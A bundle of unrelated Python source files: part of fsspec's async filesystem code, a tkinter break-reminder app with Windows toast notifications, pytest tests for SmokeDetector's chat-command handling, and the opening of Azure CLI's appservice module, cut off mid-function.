end = size + end
elif end is None:
end = ""
if isinstance(end, int):
end -= 1 # bytes range is inclusive
return "bytes=%s-%s" % (start, end)
async def _cat_file(self, path, start=None, end=None, **kwargs):
raise NotImplementedError
async def _cat(self, path, recursive=False, on_error="raise", **kwargs):
paths = await self._expand_path(path, recursive=recursive)
out = await asyncio.gather(
*[self._cat_file(path, **kwargs) for path in paths],
return_exceptions=True,
)
if on_error == "raise":
ex = next(filter(is_exception, out), False)
if ex:
raise ex
if (
len(paths) > 1
or isinstance(path, list)
or paths[0] != self._strip_protocol(path)
):
return {
k: v
for k, v in zip(paths, out)
if on_error != "omit" or not is_exception(v)
}
else:
return out[0]
async def _put(
self, lpath, rpath, recursive=False, callback=_DEFAULT_CALLBACK, **kwargs
):
"""Copy file(s) from local.
Copies a specific file or tree of files (if recursive=True). If rpath
ends with a "/", it will be assumed to be a directory, and target files
will go within.
The put_file method will be called concurrently on a batch of files. The
batch_size option can configure the amount of futures that can be executed
at the same time. If it is -1, then all the files will be uploaded concurrently.
The default can be set for this instance by passing "batch_size" in the
constructor, or for all instances by setting the "gather_batch_size" key
in ``fsspec.config.conf``, falling back to 1/8th of the system limit .
"""
from .implementations.local import LocalFileSystem, make_path_posix
rpath = self._strip_protocol(rpath)
if isinstance(lpath, str):
lpath = make_path_posix(lpath)
fs = LocalFileSystem()
lpaths = fs.expand_path(lpath, recursive=recursive)
rpaths = other_paths(lpaths, rpath)
is_dir = {l: os.path.isdir(l) for l in lpaths}
rdirs = [r for l, r in zip(lpaths, rpaths) if is_dir[l]]
file_pairs = [(l, r) for l, r in zip(lpaths, rpaths) if not is_dir[l]]
await asyncio.gather(*[self._makedirs(d, exist_ok=True) for d in rdirs])
batch_size = kwargs.pop("batch_size", self.batch_size)
coros = []
callback.call("set_size", len(file_pairs))
for lfile, rfile in file_pairs:
callback.branch(lfile, rfile, kwargs)
coros.append(self._put_file(lfile, rfile, **kwargs))
return await _run_coros_in_chunks(
coros, batch_size=batch_size, callback=callback
)
async def _get_file(self, rpath, lpath, **kwargs):
raise NotImplementedError
async def _get(
self, rpath, lpath, recursive=False, callback=_DEFAULT_CALLBACK, **kwargs
):
"""Copy file(s) to local.
Copies a specific file or tree of files (if recursive=True). If lpath
ends with a "/", it will be assumed to be a directory, and target files
will go within. Can submit a list of paths, which may be glob-patterns
and will be expanded.
The get_file method will be called concurrently on a batch of files. The
batch_size option can configure the amount of futures that can be executed
at the same time. If it is -1, then all the files will be uploaded concurrently.
The default can be set for this instance by passing "batch_size" in the
constructor, or for all instances by setting the "gather_batch_size" key
in ``fsspec.config.conf``, falling back to 1/8th of the system limit .
"""
from fsspec.implementations.local import make_path_posix
rpath = self._strip_protocol(rpath)
lpath = make_path_posix(lpath)
rpaths = await self._expand_path(rpath, recursive=recursive)
lpaths = other_paths(rpaths, lpath)
[os.makedirs(os.path.dirname(lp), exist_ok=True) for lp in lpaths]
batch_size = kwargs.pop("batch_size", self.batch_size)
coros = []
callback.lazy_call("set_size", len, lpaths)
for lpath, rpath in zip(lpaths, rpaths):
callback.branch(rpath, lpath, kwargs)
coros.append(self._get_file(rpath, lpath, **kwargs))
return await _run_coros_in_chunks(
coros, batch_size=batch_size, callback=callback
)
async def _isfile(self, path):
try:
return (await self._info(path))["type"] == "file"
except: # noqa: E722
return False
async def _isdir(self, path):
try:
return (await self._info(path))["type"] == "directory"
except IOError:
return False
async def _size(self, path):
return (await self._info(path)).get("size", None)
async def _exists(self, path):
try:
await self._info(path)
return True
except FileNotFoundError:
return False
async def _info(self, path, **kwargs):
raise NotImplementedError
async def _ls(self, path, **kwargs):
raise NotImplementedError
async def _walk(self, path, maxdepth=None, **kwargs):
path = self._strip_protocol(path)
full_dirs = {}
dirs = {}
files = {}
detail = kwargs.pop("detail", False)
try:
listing = await self._ls(path, detail=True, **kwargs)
except (FileNotFoundError, IOError):
if detail:
yield path, {}, {}
else:
yield path, [], []
return
for info in listing:
# each info name must be at least [path]/part , but here
# we check also for names like [path]/part/
pathname = info["name"].rstrip("/")
name = pathname.rsplit("/", 1)[-1]
if info["type"] == "directory" and pathname != path:
# do not include "self" path
full_dirs[pathname] = info
dirs[name] = info
elif pathname == path:
# file-like with same name as give path
files[""] = info
else:
files[name] = info
if detail:
yield path, dirs, files
else:
yield path, list(dirs), list(files)
if maxdepth is not None:
maxdepth -= 1
if maxdepth < 1:
return
for d in full_dirs:
async for _ in self._walk(d, maxdepth=maxdepth, detail=detail, **kwargs):
yield _
async def _glob(self, path, **kwargs):
import re
ends = path.endswith("/")
path = self._strip_protocol(path)
indstar = path.find("*") if path.find("*") >= 0 else len(path)
indques = path.find("?") if path.find("?") >= 0 else len(path)
indbrace = path.find("[") if path.find("[") >= 0 else len(path)
ind = min(indstar, indques, indbrace)
detail = kwargs.pop("detail", False)
if not has_magic(path):
root = path
depth = 1
if ends:
path += "/*"
elif await self._exists(path):
if not detail:
return [path]
else:
return {path: await self._info(path)}
else:
if not detail:
return [] # glob of non-existent returns empty
else:
return {}
elif "/" in path[:ind]:
ind2 = path[:ind].rindex("/")
root = path[: ind2 + 1]
depth = None if "**" in path else path[ind2 + 1 :].count("/") + 1
else:
root = ""
depth = None if "**" in path else path[ind + 1 :].count("/") + 1
allpaths = await self._find(
root, maxdepth=depth, withdirs=True, detail=True, **kwargs
)
# Escape characters special to python regex, leaving our supported
# special characters in place.
# See https://www.gnu.org/software/bash/manual/html_node/Pattern-Matching.html
# for shell globbing details.
pattern = (
"^"
+ (
path.replace("\\", r"\\")
.replace(".", r"\.")
.replace("+", r"\+")
.replace("//", "/")
.replace("(", r"\(")
.replace(")", r"\)")
.replace("|", r"\|")
.replace("^", r"\^")
.replace("$", r"\$")
.replace("{", r"\{")
.replace("}", r"\}")
.rstrip("/")
.replace("?", ".")
)
+ "$"
)
pattern = re.sub("[*]{2}", "=PLACEHOLDER=", pattern)
pattern = re.sub("[*]", "[^/]*", pattern)
pattern = re.compile(pattern.replace("=PLACEHOLDER=", ".*"))
out = {
p: allpaths[p]
for p in sorted(allpaths)
if pattern.match(p.replace("//", "/").rstrip("/"))
}
if detail:
return out
else:
return list(out)
async def _du(self, path, total=True, maxdepth=None, **kwargs):
sizes = {}
# async for?
for f in await self._find(path, maxdepth=maxdepth, **kwargs):
info = await self._info(f)
sizes[info["name"]] = info["size"]
if total:
return sum(sizes.values())
else:
return sizes
async def _find(self, path, maxdepth=None, withdirs=False, **kwargs):
path = self._strip_protocol(path)
out = dict()
detail = kwargs.pop("detail", False)
# async for?
async for _, dirs, files in self._walk(path, maxdepth, detail=True, **kwargs):
if withdirs:
files.update(dirs)
out.update({info["name"]: info for name, info in files.items()})
if not out and (await self._isfile(path)):
# walk works on directories, but find should also return [path]
# when path happens to be a file
out[path] = {}
names = sorted(out)
if not detail:
return names
else:
return {name: out[name] for name in names}
async def _expand_path(self, path, recursive=False, maxdepth=None):
if isinstance(path, str):
out = await self._expand_path([path], recursive, maxdepth)
else:
# reduce depth on each recursion level unless None or 0
maxdepth = maxdepth if not maxdepth else maxdepth - 1
out = set()
path = [self._strip_protocol(p) for p in path]
for p in path: # can gather here
if has_magic(p):
bit = set(await self._glob(p))
out |= bit
if recursive:
out |= set(
await self._expand_path(
list(bit), recursive=recursive, maxdepth=maxdepth
)
)
continue
elif recursive:
rec = set(await self._find(p, maxdepth=maxdepth, withdirs=True))
out |= rec
if p not in out and (recursive is False or (await self._exists(p))):
# should only check once, for the root
out.add(p)
if not out:
raise FileNotFoundError(path)
return list(sorted(out))
async def _mkdir(self, path, create_parents=True, **kwargs):
pass # not necessary to implement, may not have directories
async def _makedirs(self, path, exist_ok=False):
pass # not necessary to implement, may not have directories
def mirror_sync_methods(obj):
"""Populate sync and async methods for obj
For each method will create a sync version if the name refers to an async method
(coroutine) and there is no override in the child class; will create an async
method for the corresponding sync method if there is no implementation.
Uses the methods specified in
- async_methods: the set that an implementation is expected to provide
- default_async_methods: that can be derived from their sync version in
AbstractFileSystem
- AsyncFileSystem: async-specific default coroutines
"""
from fsspec import AbstractFileSystem
for method in async_methods + dir(AsyncFileSystem):
if not method.startswith("_"):
continue
smethod = method[1:]
if private.match(method):
isco = inspect.iscoroutinefunction(getattr(obj, method, None))
unsync = getattr(getattr(obj, smethod, False), "__func__", None)
is_default = unsync is getattr(AbstractFileSystem, smethod, "")
if isco and is_default:
mth = sync_wrapper(getattr(obj, method), obj=obj)
setattr(obj, smethod, mth)
if not mth.__doc__:
mth.__doc__ = getattr(
getattr(AbstractFileSystem, smethod, None), "__doc__", ""
)
class FSSpecCoroutineCancel(Exception):
pass
def _dump_running_tasks(
printout=True, cancel=True, exc=FSSpecCoroutineCancel, with_task=False
):
import traceback
if PY36:
raise NotImplementedError("Do not call this on Py 3.6")
tasks = [t for t in asyncio.tasks.all_tasks(loop[0]) if not t.done()]
if printout:
[task.print_stack() for task in tasks]
out = [
{
"locals": task._coro.cr_frame.f_locals,
"file": task._coro.cr_frame.f_code.co_filename,
"firstline": task._coro.cr_frame.f_code.co_firstlineno,
"linelo": task._coro.cr_frame.f_lineno,
"stack": traceback.format_stack(task._coro.cr_frame),
"task": task if with_task else None,
}
for task in tasks
]
if cancel:
for t in tasks:
cbs = t._callbacks
t.cancel()
asyncio.futures.Future.set_exception(t, exc)
asyncio.futures.Future.cancel(t)
[cb[0](t) for cb in cbs] # cancels any dependent concurrent.futures
try:
t._coro.throw(exc) # exits coro, unless explicitly handled
except exc:
pass
return out
|
breaks.py
|
from tkinter import *
from utility import *
from tkinter import messagebox
import time
import threading
from win10toast import ToastNotifier
toast = ToastNotifier()
def main(root, WIDTH, HEIGHT, wu, hu):
global productiveTimeEntry, breakTimeEntry, currentStatusLabel
root.config(bg = "black")
heading = Label(root, text = "Notifications", font = ( "", int(calculateFontSize(WIDTH, hu*20) * 1.5)), fg = "black", bg = "#bdbdbd")
heading.place(x = 0, y = 0, width = WIDTH, height = hu*20)
productiveTimeLabel = Label(root, text = "Enter the amount of time(in minutes) between breaks", font = ( "", int(calculateFontSize(wu*70, hu*15) )), fg = "white", bg = "black", justify = LEFT)
productiveTimeLabel.place(x = 5*wu, y = 25*hu, height = hu*10)
productiveTimeEntry = Entry(root, font = ("", int(calculateFontSize(wu * 90, hu*10)*2/3)), highlightbackground="red")
productiveTimeEntry.place(x = 5*wu, y = 35*hu, width = wu*90, height = hu*10)
breakTimeLabel = Label(root, text = "Enter the length(in minutes) of breaks", font = ( "", int(calculateFontSize(wu*70, hu*15) )), fg = "white", bg = "black", justify = LEFT)
breakTimeLabel.place(x = 5*wu, y = 45*hu, height = hu*10)
breakTimeEntry = Entry(root, font = ("", int(calculateFontSize(wu * 90, hu*10)*2/3)), highlightbackground="red")
breakTimeEntry.place(x = 5*wu, y = 55*hu, width = wu*90, height = hu*10)
currentStatusLabel = Label(root, text = "Current Status : N/A", font = ( "", int(calculateFontSize(wu*40, hu*10) )), fg = "white", bg = "black", justify = LEFT)
currentStatusLabel.place(x = 5*wu, y = 65*hu, height = hu*10)
helpButton = standardButton(root, "Not Working? Click For Help", lambda : showHelp(root, WIDTH, HEIGHT), wu*50, hu*8)
helpButton.place(x = wu*55, width = wu*40, height = hu*8, y = 65*hu)
startButton = RoundedButton(root, "black", 25*wu, 25*hu, "Start", int(calculateFontSize(25*wu, 25*hu)*1.2), startNotifications, "#00ff6e")
startButton.place(x = 5*wu, y = 75*hu, width = 25*wu, height = 25*hu)
backButton = RoundedButton(root, "black", 30*wu, 25*hu, "Go Back", int(calculateFontSize(30*wu, 25*hu)*1.2), root.place_forget, "#00bbff")
backButton.place(x = 35*wu, y = 75*hu, width = 30*wu, height = 25*hu)
stopButton = RoundedButton(root, "black", 25*wu, 25*hu, "Stop", int(calculateFontSize(25*wu, 25*hu)*1.2), stopNotifications, "#00ff6e")
stopButton.place(x = 70*wu, y = 75*hu, width = 25*wu, height = 25*hu)
root.mainloop()
def showNotifications(title, description):
showNotification = threading.Thread(target = lambda : toast.show_toast(title, description))
showNotification.start()
return showNotification
def startNotifications():
showNotifications("Notifications On", "You will recieve notifications like this for taking breaks")
userNotificationData = {
"notifications":{"showNotifications":True}
}
modifyUserActivity(userNotificationData)
def checkToLeave(lengthOfBreak):
start = time.time()
if lengthOfBreak == "":
messagebox.showinfo("Error", "Enter a valid time")
return True
while time.time() - start < float(lengthOfBreak) * 60:
time.sleep(1)
if not getUserActivity()["notifications"]["showNotifications"]:
return True
return False
def notificationCycle(productiveTime, breakTime):
while True:
currentStatusLabel['text'] = "Working Time"
if checkToLeave(productiveTime):break
showNotifications("Break Time", "It is time to take a break")
currentStatusLabel['text'] = "Break Time"
if checkToLeave(breakTime):break
showNotifications("Break Over", "the break is now over, please continue your work")
notificationCycleThread = threading.Thread(target = lambda : notificationCycle(productiveTimeEntry.get(), breakTimeEntry.get()))
notificationCycleThread.start()
def stopNotifications():
data = getUserActivity()["notifications"]
if data["showNotifications"]:
userNotificationData = {
"notifications":{"showNotifications":False}
}
modifyUserActivity(userNotificationData)
time.sleep(3)
showNotifications("Notifications Off", "The notifications are now turned off")
def showHelp(root, WIDTH, HEIGHT):
wu, hu = WIDTH/100, HEIGHT/100
aboutText = """
This feature helps users be focused with breaks. You need to enter the time you want to be taking breaks,
then click start, once you click start then the program will start with the state of you working. After the
specified time(given by the user) it will send a notification saying that it is time to a break. Then after
the time of the break is over it will again sendma notification to the user to continue working. This will
continue indefinitely until the user stops it or closes the application.
If you don't get any notifications after clicking start then this might be because your windows settings don't
allow applications to show notifications, to enable that you need to go to notifications and action settings,
just search in the search bar of windows. Then under notifications you need to enable notifications from apps
and other senders. This will allow the notifications to come.
"""
aboutScreen = Frame(root, bg = "black")
aboutScreen.place(x = 0, y = 0, width = WIDTH, height = HEIGHT)
title = Label(aboutScreen, text = "Help with Notifications", font = ("", calculateFontSize(WIDTH, hu*25)), fg = "white", bg = "black")
title.place(x = 0, y = 0, height = hu*25, width = WIDTH)
showDescription = Label(aboutScreen, text = aboutText, font = ("", int(calculateFontSize(wu*90, hu*45)*2/5)), justify = "left")
showDescription.place(x = 5*wu, y = hu*25, width = wu*90, height = 50*hu)
backButton = assistButton(aboutScreen, "Go Back", aboutScreen.place_forget, 70*wu, 15*hu)
backButton.place(x = 15*wu, width = 70*wu, y = 80*hu, height = 15*hu)
|
test_chatcommunicate.py
|
# coding=utf-8
import chatcommunicate
import chatcommands
from globalvars import GlobalVars
from datahandling import _remove_pickle
import collections
import io
import os
import os.path
import pytest
import threading
import time
import yaml
from fake import Fake
from unittest.mock import Mock, patch
def test_validate_yaml():
with open("rooms.yml", "r") as f:
room_data = yaml.safe_load(f.read())
with open("users.yml", "r") as f:
user_data = yaml.safe_load(f.read())
flatten = lambda l: [item for sublist in l for item in sublist]
privileged_users = []
for site, site_rooms in room_data.items():
for room_id, room in site_rooms.items():
if "privileges" not in room:
continue
if "additional" in room["privileges"]:
privileged_users.append(room["privileges"]["additional"])
if "inherit" not in room["privileges"]:
privileged_users.append(room["privileges"])
privileged_users = set(flatten(privileged_users))
for uid in privileged_users:
if uid not in user_data:
pytest.fail("Privileged user {} does not have a corresponding entry in users.yml".format(uid))
def test_parse_room_config():
chatcommunicate.parse_room_config("test/test_rooms.yml")
assert ("stackexchange.com", 11540) in chatcommunicate._command_rooms
assert ("stackexchange.com", 30332) in chatcommunicate._command_rooms
assert ("stackoverflow.com", 111347) in chatcommunicate._command_rooms
assert ("stackexchange.com", 3) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._command_rooms
assert ("meta.stackexchange.com", 89) not in chatcommunicate._command_rooms
assert ("stackexchange.com", 11540) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 3) in chatcommunicate._watcher_rooms
assert ("meta.stackexchange.com", 89) in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 30332) not in chatcommunicate._watcher_rooms
assert ("stackexchange.com", 54445) not in chatcommunicate._watcher_rooms
assert ("stackoverflow.com", 111347) not in chatcommunicate._watcher_rooms
assert chatcommunicate._privileges[("stackexchange.com", 11540)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 30332)] == {121520, 10145}
assert chatcommunicate._privileges[("stackexchange.com", 3)] == set()
assert chatcommunicate._privileges[("stackexchange.com", 54445)] == set()
assert chatcommunicate._privileges[("meta.stackexchange.com", 89)] == {262823}
assert chatcommunicate._privileges[("stackoverflow.com", 111347)] == {3160466, 603346}
assert len(chatcommunicate._room_roles) == 5
assert chatcommunicate._room_roles["debug"] == {("stackexchange.com", 11540)}
assert chatcommunicate._room_roles["all"] == {("stackexchange.com", 11540),
("stackexchange.com", 54445),
("stackoverflow.com", 111347)}
assert chatcommunicate._room_roles["metatavern"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["delay"] == {("meta.stackexchange.com", 89)}
assert chatcommunicate._room_roles["no-all-caps title"] == {("meta.stackexchange.com", 89)}
@patch("chatcommunicate.threading.Thread")
@patch("chatcommunicate.Client")
@patch("chatcommunicate.parse_room_config")
def test_init(room_config, client_constructor, thread):
client = Mock()
client_constructor.return_value = client
client.login.side_effect = Exception()
# https://stackoverflow.com/questions/23337471/
with pytest.raises(Exception) as e:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
assert str(e.value).endswith("Failed to log into {}, max retries exceeded".format(next(iter(chatcommunicate._clients))))
client.login.side_effect = None
client.login.reset_mock()
client_constructor.reset_mock()
room_config.side_effect = lambda _: room_config.get_original()("test/test_rooms.yml")
GlobalVars.standby_mode = True
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
except Exception:
return # This interferes with the following tests
assert len(chatcommunicate._rooms) == 0
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
client.login.reset_mock()
client_constructor.reset_mock()
thread.reset_mock()
GlobalVars.standby_mode = False
counter = 0
def throw_every_other(*_):
nonlocal counter
counter += 1
if counter & 1:
raise Exception()
client.login.side_effect = throw_every_other
# See GitHub Issue #2498, temporary workaround
try:
chatcommunicate.init("shoutouts", "to simpleflips", try_cookies=False)
except Exception as e:
return # Because this causes the following checks to fail
assert client_constructor.call_count == 3
client_constructor.assert_any_call("stackexchange.com")
client_constructor.assert_any_call("stackoverflow.com")
client_constructor.assert_any_call("meta.stackexchange.com")
assert thread.call_count == 2
thread.assert_any_call(name="pickle ---rick--- runner", target=chatcommunicate.pickle_last_messages, daemon=True)
thread.assert_any_call(name="message sender", target=chatcommunicate.send_messages, daemon=True)
assert len(chatcommunicate._rooms) == 3
assert chatcommunicate._rooms[("stackexchange.com", 11540)].deletion_watcher is True
assert chatcommunicate._rooms[("stackexchange.com", 30332)].deletion_watcher is False
assert chatcommunicate._rooms[("stackoverflow.com", 111347)].deletion_watcher is False
@pytest.mark.skipif(os.path.isfile("messageData.p"), reason="shouldn't overwrite file")
@patch("chatcommunicate.pickle.dump")
def test_pickle_rick(dump):
try:
threading.Thread(target=chatcommunicate.pickle_last_messages, daemon=True).start()
chatcommunicate._pickle_run.set()
# Yield to the pickling thread until it acquires the lock again
while len(chatcommunicate._pickle_run._cond._waiters) == 0:
time.sleep(0)
assert dump.call_count == 1
call, _ = dump.call_args_list[0]
assert isinstance(call[0], chatcommunicate.LastMessages)
assert isinstance(call[1], io.IOBase) and call[1].name == "messageData.p"
finally:
_remove_pickle("messageData.p")
@patch("chatcommunicate._pickle_run")
def test_message_sender(pickle_rick):
chatcommunicate._last_messages = chatcommunicate.LastMessages({}, collections.OrderedDict())
threading.Thread(target=chatcommunicate.send_messages, daemon=True).start()
room = chatcommunicate.RoomData(Mock(), -1, False)
room.room.id = 11540
room.room._client.host = "stackexchange.com"
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 1}})
chatcommunicate._msg_queue.put((room, "test", None))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 11540, "test"))
room.room.reset_mock()
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
room.room.id = 30332
room.room._client._do_action_despite_throttling.return_value = Fake({"json": lambda: {"id": 2}})
chatcommunicate._msg_queue.put((room, "test", "did you hear about what happened to pluto"))
while not chatcommunicate._msg_queue.empty():
time.sleep(0)
room.room._client._do_action_despite_throttling.assert_called_once_with(("send", 30332, "test"))
assert chatcommunicate._last_messages.messages[("stackexchange.com", 11540)] == collections.deque((1,))
assert chatcommunicate._last_messages.reports == collections.OrderedDict({("stackexchange.com", 2): "did you hear about what happened to pluto"})
@patch("chatcommunicate._msg_queue.put")
@patch("chatcommunicate.get_last_messages")
def test_on_msg(get_last_messages, post_msg):
client = Fake({
"_br": {
"user_id": 1337
},
"host": "stackexchange.com"
})
room_data = chatcommunicate.RoomData(Mock(), -1, False)
chatcommunicate._rooms[("stackexchange.com", 11540)] = room_data
chatcommunicate.on_msg(Fake({}, spec=chatcommunicate.events.MessageStarred), None) # don't reply to events we don't care about
msg1 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1,
},
"parent": None,
"content": "shoutouts to simpleflips"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg1, client)
msg2 = Fake({
"message": {
"room": {
"id": 11540
},
"owner": {
"id": 1337
},
"id": 999,
"parent": None,
"content": "!!/not_actually_a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
chatcommunicate.on_msg(msg2, client)
msg3 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 999,
"parent": None,
"content": "!!/a_command"
}
}, spec=chatcommunicate.events.MessagePosted)
mock_command = Mock(side_effect=lambda *_, **kwargs: "hi" if not kwargs["quiet_action"] else "")
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 0))
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command-"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (0, 1))
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(None, original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("1 2 3", original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
chatcommunicate._prefix_commands["a_command"] = (mock_command, (1, 2))
msg3.message.content = "!!/a_command"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too few arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 1 2 oatmeal"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 Too many arguments."
mock_command.assert_not_called()
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command- 1 2"
chatcommunicate.on_msg(msg3, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with("1", "2", original_msg=msg3.message, alias_used="a_command", quiet_action=True)
post_msg.reset_mock()
mock_command.reset_mock()
msg3.message.content = "!!/a_command 3"
chatcommunicate.on_msg(msg3, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":999 hi"
mock_command.assert_called_once_with("3", None, original_msg=msg3.message, alias_used="a_command", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg4 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 2
}
},
"id": 1000,
"content": "asdf"
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate.on_msg(msg4, client)
msg5 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"parent": {
"owner": {
"id": 1337
}
},
"id": 1000,
"content": "@SmokeDetector why "
}
}, spec=chatcommunicate.events.MessageEdited)
chatcommunicate._reply_commands["why"] = (mock_command, (0, 0))
threw_exception = False
try:
chatcommunicate.on_msg(msg5, client)
except AssertionError:
threw_exception = True
assert threw_exception
mock_command.assert_not_called()
post_msg.assert_not_called()
chatcommunicate._reply_commands["why"] = (mock_command, (1, 1))
chatcommunicate.on_msg(msg5, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 hi"
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=False)
post_msg.reset_mock()
mock_command.reset_mock()
msg5.message.content = "@SmokeDetector why@!@#-"
chatcommunicate.on_msg(msg5, client)
post_msg.assert_not_called()
mock_command.assert_called_once_with(msg5.message.parent, original_msg=msg5.message, alias_used="why", quiet_action=True)
msg6 = Fake({
"message": {
"room": {
"id": 11540,
},
"owner": {
"id": 1
},
"id": 1000,
"parent": None,
"content": "sd why - 2why 2why- 2- why- "
}
}, spec=chatcommunicate.events.MessageEdited)
get_last_messages.side_effect = lambda _, num: (Fake({"id": i}) for i in range(num))
chatcommunicate.on_msg(msg6, client)
assert post_msg.call_count == 1
assert post_msg.call_args_list[0][0][0][1] == ":1000 [:0] hi\n[:1] <skipped>\n[:2] hi\n[:3] hi\n[:4] <processed without return value>\n[:5] <processed without return value>\n[:6] <skipped>\n[:7] <skipped>\n[:8] <processed without return value>"
def test_message_type():
fake1 = Fake({}, spec=chatcommunicate.Message)
assert chatcommands.message(fake1) == fake1
fake2 = Fake({})
threw_exception = False
try:
chatcommands.message(fake2)
except AssertionError:
threw_exception = True
assert threw_exception
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from __future__ import print_function
import threading
import time
import ast
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from binascii import hexlify
from os import urandom
import datetime
import json
import ssl
import sys
import uuid
from functools import reduce
from http import HTTPStatus
from six.moves.urllib.request import urlopen # pylint: disable=import-error, ungrouped-imports
import OpenSSL.crypto
from fabric import Connection
from knack.prompting import prompt_pass, NoTTYException
from knack.util import CLIError
from knack.log import get_logger
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from azure.mgmt.storage import StorageManagementClient
from azure.mgmt.applicationinsights import ApplicationInsightsManagementClient
from azure.mgmt.relay.models import AccessRights
from azure.mgmt.web.models import KeyInfo, DefaultErrorResponseException
from azure.cli.command_modules.relay._client_factory import hycos_mgmt_client_factory, namespaces_mgmt_client_factory
from azure.cli.command_modules.network._client_factory import network_client_factory
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.commands import LongRunningOperation
from azure.cli.core.util import in_cloud_console, shell_safe_json_parse, open_page_in_browser, get_json_object, \
ConfiguredDefaultSetter, sdk_no_wait, get_file_json
from azure.cli.core.util import get_az_user_agent
from azure.cli.core.profiles import ResourceType, get_sdk
from .tunnel import TunnelServer
from .vsts_cd_provider import VstsContinuousDeliveryProvider
from ._params import AUTH_TYPES, MULTI_CONTAINER_TYPES
from ._client_factory import web_client_factory, ex_handler_factory, providers_client_factory
from ._appservice_utils import _generic_site_operation
from .utils import _normalize_sku, get_sku_name, retryable_method
from ._create_util import (zip_contents_from_dir, get_runtime_version_details, create_resource_group, get_app_details,
should_create_new_rg, set_location, get_site_availability, get_profile_username,
get_plan_to_use, get_lang_from_content, get_rg_to_use, get_sku_to_use,
detect_os_form_src, get_current_stack_from_runtime)
from ._constants import (FUNCTIONS_STACKS_API_JSON_PATHS, FUNCTIONS_STACKS_API_KEYS,
FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX,
NODE_EXACT_VERSION_DEFAULT, RUNTIME_STACKS, FUNCTIONS_NO_V2_REGIONS)
logger = get_logger(__name__)
# pylint:disable=no-member,too-many-lines,too-many-locals
# region "Common routines shared with quick-start extensions."
# Please maintain compatibility in both interfaces and functionalities"
def create_webapp(cmd, resource_group_name, name, plan, runtime=None, startup_file=None, # pylint: disable=too-many-statements,too-many-branches
deployment_container_image_name=None, deployment_source_url=None, deployment_source_branch='master',
deployment_local_git=None, docker_registry_server_password=None, docker_registry_server_user=None,
multicontainer_config_type=None, multicontainer_config_file=None, tags=None,
using_webapp_up=False, language=None, assign_identities=None,
role='Contributor', scope=None):
SiteConfig, SkuDescription, Site, NameValuePair = cmd.get_models(
'SiteConfig', 'SkuDescription', 'Site', 'NameValuePair')
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
client = web_client_factory(cmd.cli_ctx)
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
